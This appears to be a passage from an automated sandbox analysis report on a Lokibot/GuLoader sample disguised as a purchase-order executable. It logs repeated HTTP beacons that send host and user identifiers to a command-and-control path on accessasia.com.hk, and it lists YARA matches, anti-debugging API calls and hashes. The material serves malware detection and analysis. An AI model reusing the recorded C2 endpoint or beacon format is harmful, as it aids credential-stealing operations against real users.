                            Feb 23, 2021 08:50:00.543251038 CET6042OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:50:00.736491919 CET6043INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:50:00 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            37192.168.2.549777192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:50:01.225791931 CET6044OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:50:01.389466047 CET6044OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:50:01.773279905 CET6044INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:50:01 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            38192.168.2.549778192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:50:02.942234039 CET6045OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:50:03.104578972 CET6046OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:50:03.318948984 CET6046INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:50:03 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            39192.168.2.549779192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:50:04.328154087 CET6047OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:50:04.497581959 CET6047OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:50:04.715640068 CET6047INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:50:04 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            4192.168.2.549736192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:31.069634914 CET5366OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:31.232763052 CET5366OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:31.424293995 CET5367INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:31 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            40192.168.2.549780192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:50:05.623106956 CET6048OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:50:05.786597013 CET6048OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:50:05.984535933 CET6049INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:50:05 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            5192.168.2.549737192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:31.953352928 CET5367OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:32.114974976 CET5368OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:32.325089931 CET5368INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:32 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            6192.168.2.549738192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:32.896542072 CET5369OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:33.059552908 CET5369OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:33.251894951 CET5369INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:32 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            7192.168.2.549739192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:33.755837917 CET5370OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:33.918710947 CET5371OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:34.109647989 CET5371INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:33 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            8192.168.2.549740192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:34.630259037 CET5372OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:34.792737007 CET5372OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:34.981544971 CET5372INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:34 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            9192.168.2.549741192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:35.508750916 CET5373OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:35.676172972 CET5379OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:35.876161098 CET5382INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:35 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Code Manipulations

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Start time:08:47:58
                            Start date:23/02/2021
                            Path:C:\Users\user\Desktop\PO-A2174679-06.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\user\Desktop\PO-A2174679-06.exe'
                            Imagebase:0x400000
                            File size:86016 bytes
                            MD5 hash:FDEC289FB4626DD56BBB55770AE5F432
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Visual Basic
                            Reputation:low

                            General

                            Start time:08:48:51
                            Start date:23/02/2021
                            Path:C:\Users\user\Desktop\PO-A2174679-06.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\user\Desktop\PO-A2174679-06.exe'
                            Imagebase:0x400000
                            File size:86016 bytes
                            MD5 hash:FDEC289FB4626DD56BBB55770AE5F432
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 0000000B.00000002.501855027.0000000000A83000.00000004.00000020.sdmp, Author: Joe Security
                            Reputation:low

                            Disassembly

                            Code Analysis

                            Reset < >

                              Executed Functions

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad
                              • String ID: W.E$7%=_
                              • API String ID: 1029625771-218856640
                              • Opcode ID: 9966bc6b746c6a629a21a45f0c6626850fe219bed8ef6e65f8a9954a5cfc30c7
                              • Instruction ID: 3b21657f3ab2881bcf398021d910ef46cdac12cf1210e9021a12f704b6be0b18
                              • Opcode Fuzzy Hash: 9966bc6b746c6a629a21a45f0c6626850fe219bed8ef6e65f8a9954a5cfc30c7
                              • Instruction Fuzzy Hash: 22C25679240386AADB229FA9CD553987762EF5375CF7880CDD4908B093D332D696CBC2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 02BC6443: LoadLibraryA.KERNELBASE(?,082962C8,?,02BC07A4,?,?), ref: 02BC655D
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 02BC08F3
                              • LdrInitializeThunk.NTDLL(?,?,?,02BC1656,00000000,00000000,00000000,00000000,00000105,0000034D,?,02BC3E1B,?,?,00000004), ref: 02BC4E03
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InformationInitializeLibraryLoadThreadThunk
                              • String ID: 1.!T
                              • API String ID: 322515642-3147410236
                              • Opcode ID: c36d9146f8691be58fcde61e2a426680c4607e7cd6b461b9aaf6459939f989b6
                              • Instruction ID: 51c3c5f6fedef889a7a20e7524445e65f623e61e13798fcee673d6b5511b8070
                              • Opcode Fuzzy Hash: c36d9146f8691be58fcde61e2a426680c4607e7cd6b461b9aaf6459939f989b6
                              • Instruction Fuzzy Hash: 9B127570600349AFEB215F68CDA17D93BA3EF82714F7481ADEE849B1D1D7759980CB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 02BC08F3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: cf650a143b4412a58a1764acec32500fb32fe05647ea4564667a5933c40408f8
                              • Instruction ID: c8bf0433eb0ac6fa9c64246ceee95ccc4567ac8f4a6ad16afc9be72fc61a3bda
                              • Opcode Fuzzy Hash: cf650a143b4412a58a1764acec32500fb32fe05647ea4564667a5933c40408f8
                              • Instruction Fuzzy Hash: 6D12547060034AAFFB315E68CDA4BE93BA2EF42754F7481A9EE449B1D0D7759980CB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 02BC08F3
                              • LdrInitializeThunk.NTDLL(?,?,?,02BC1656,00000000,00000000,00000000,00000000,00000105,0000034D,?,02BC3E1B,?,?,00000004), ref: 02BC4E03
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InformationInitializeThreadThunk
                              • String ID: 1.!T
                              • API String ID: 1629277043-3147410236
                              • Opcode ID: dc7137749fc900a6cc457c2aeeb1e1c356240bc47a1d74ee7e93d5a4fabf853f
                              • Instruction ID: 12f5d95a62c107f818034b4822f65c172af4b4db4622e5b62bb5f6e35143af78
                              • Opcode Fuzzy Hash: dc7137749fc900a6cc457c2aeeb1e1c356240bc47a1d74ee7e93d5a4fabf853f
                              • Instruction Fuzzy Hash: 2A919F7450438ADBEB215FBC8AB539A7BB2EF13754F7482DDD9904B0A2E7708505CB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • EnumWindows.USER32(02BC0764,?,00000000,00000000,02BC0CD2,00000000,?,00003000,00000004), ref: 02BC0748
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 02BC08F3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: EnumInformationThreadWindows
                              • String ID: 1.!T
                              • API String ID: 1954852945-3147410236
                              • Opcode ID: 39a1c590d7deea0007c8a0deddbc0699b4c19984b8079c77f1afed08ea1ddef1
                              • Instruction ID: f2b392c7d9d6bcffecec41416d59462e33edd895930d16ace583d2257b4a858e
                              • Opcode Fuzzy Hash: 39a1c590d7deea0007c8a0deddbc0699b4c19984b8079c77f1afed08ea1ddef1
                              • Instruction Fuzzy Hash: C1712A74500386EBEB216FBC8DB139A77A2DF13768F7482D9D9A04B0D2E7718545CB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID: AJhb
                              • API String ID: 0-1903757705
                              • Opcode ID: 1708631209ddefdaa948148ce8df3caf9b4947e66523307b1a29d08c9e090987
                              • Instruction ID: 2122da860750add6d12eb7f9d5c912a7e461c13f4310c5b079a2dbfc2afc621d
                              • Opcode Fuzzy Hash: 1708631209ddefdaa948148ce8df3caf9b4947e66523307b1a29d08c9e090987
                              • Instruction Fuzzy Hash: 89C133717443456FEF224F60CD95BE83AA3AF86304F74C1ADEE889A2D1C7B99480CB55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad
                              • String ID: AJhb
                              • API String ID: 1029625771-1903757705
                              • Opcode ID: 3b04bf31830473e07c05f9b8cc34fe31abae411e2d8ad0e7a5f4dc720a0d0c1c
                              • Instruction ID: 56f61e1429b0622916ead5dea038c0b8dda0f4ad6a07ca0b82d2cf941a621a63
                              • Opcode Fuzzy Hash: 3b04bf31830473e07c05f9b8cc34fe31abae411e2d8ad0e7a5f4dc720a0d0c1c
                              • Instruction Fuzzy Hash: 9DF15475700301AFFB350E68CD84BE97AA7EF86314F70816DEE85A62C4D7B598C1CA50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 02BC08F3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: d160d31f6f5a86d0cbfdaca28d8a4f86634f7de341e80e8c665f2bf527866389
                              • Instruction ID: 43bb9865102d54d4b95ba673762b29d05991f74f76205a351b53124b9f67d448
                              • Opcode Fuzzy Hash: d160d31f6f5a86d0cbfdaca28d8a4f86634f7de341e80e8c665f2bf527866389
                              • Instruction Fuzzy Hash: B8818B7460438ADBEB215FBC89B03AA77A2DF13764FB482EDD991570D2E7709444CB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 02BC08F3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: 0f0ead122c33a67c044e3d8bcb0539e329db315edd5dbb662c7a5e22d35bbb08
                              • Instruction ID: d0186f108d809c45a950bc9145a2d8b27fefed074502e977e73c28967854db32
                              • Opcode Fuzzy Hash: 0f0ead122c33a67c044e3d8bcb0539e329db315edd5dbb662c7a5e22d35bbb08
                              • Instruction Fuzzy Hash: CD71697460038ADAEB215EBC8AB03DA77A2DF03764FB482E9DD90470D2E771C445CA82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 02BC6443: LoadLibraryA.KERNELBASE(?,082962C8,?,02BC07A4,?,?), ref: 02BC655D
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 02BC08F3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InformationLibraryLoadThread
                              • String ID: 1.!T
                              • API String ID: 543350213-3147410236
                              • Opcode ID: 60def572062a4a3dfda7579a490545d268d14e1241085b1cedf38e48f3ecc3f4
                              • Instruction ID: ef6ff0e752de341dac142889b9bd2996b88730fbf2c463ef7f8c788ec0cc5fb3
                              • Opcode Fuzzy Hash: 60def572062a4a3dfda7579a490545d268d14e1241085b1cedf38e48f3ecc3f4
                              • Instruction Fuzzy Hash: 6F713B7460078ADBEB215FBC8EB039A77A2DF13764F7492E9D960470D2E7708545CB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 02BC08F3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: 6358b112bd10160f428779cd0e9e18536c15f0b89a16b56128ebee2e7ee864f0
                              • Instruction ID: abbd6b7e9351baaafafe3d70cb420eda57654f35f65deab8d910266e6ae67c49
                              • Opcode Fuzzy Hash: 6358b112bd10160f428779cd0e9e18536c15f0b89a16b56128ebee2e7ee864f0
                              • Instruction Fuzzy Hash: 3161497450038ADBEB215FBC8DB539A77A2DF13B64F7442D9D9904B0E2E7708545CB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 02BC08F3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: 5cfd5da95c71f2cee7b8e6abe58a1572539ab986310713ea01b2198c2ffd1210
                              • Instruction ID: a2c6db232c8a75ce96cbd76a1e90bf118086ffe73e9d17003317118926646fb3
                              • Opcode Fuzzy Hash: 5cfd5da95c71f2cee7b8e6abe58a1572539ab986310713ea01b2198c2ffd1210
                              • Instruction Fuzzy Hash: 0871597450038ADBEB215FBC89B139A77A2DF13B64F7482D9D9904B0E2E7708545CB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d6493c670f3f41acaf8f09acd4077287489f10651e9033c3153bb017b745fdfe
                              • Instruction ID: 35f486afd64baabc1949319ba7722b44eafed53e7646dee7d29b4ec7cfda0132
                              • Opcode Fuzzy Hash: d6493c670f3f41acaf8f09acd4077287489f10651e9033c3153bb017b745fdfe
                              • Instruction Fuzzy Hash: 36124974700346AFEB259F68CC94BD8BB92EF92314FA4C1ADE9844B1D1D775C482CB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 953d2234080071abd0ec777cd239120c9a98cc1f01c122a090f31e549e484c4a
                              • Instruction ID: c9071f9b621e8adcf7679c8fbcabdeb7cd25080bb65090e86748d093be01ef4c
                              • Opcode Fuzzy Hash: 953d2234080071abd0ec777cd239120c9a98cc1f01c122a090f31e549e484c4a
                              • Instruction Fuzzy Hash: 25323479140AC6EAC7279FAAD5493187762EF1370CF68A4C9D0504B463D372D6A6CBC3
                              Uniqueness

                              Uniqueness Score: -1.00%

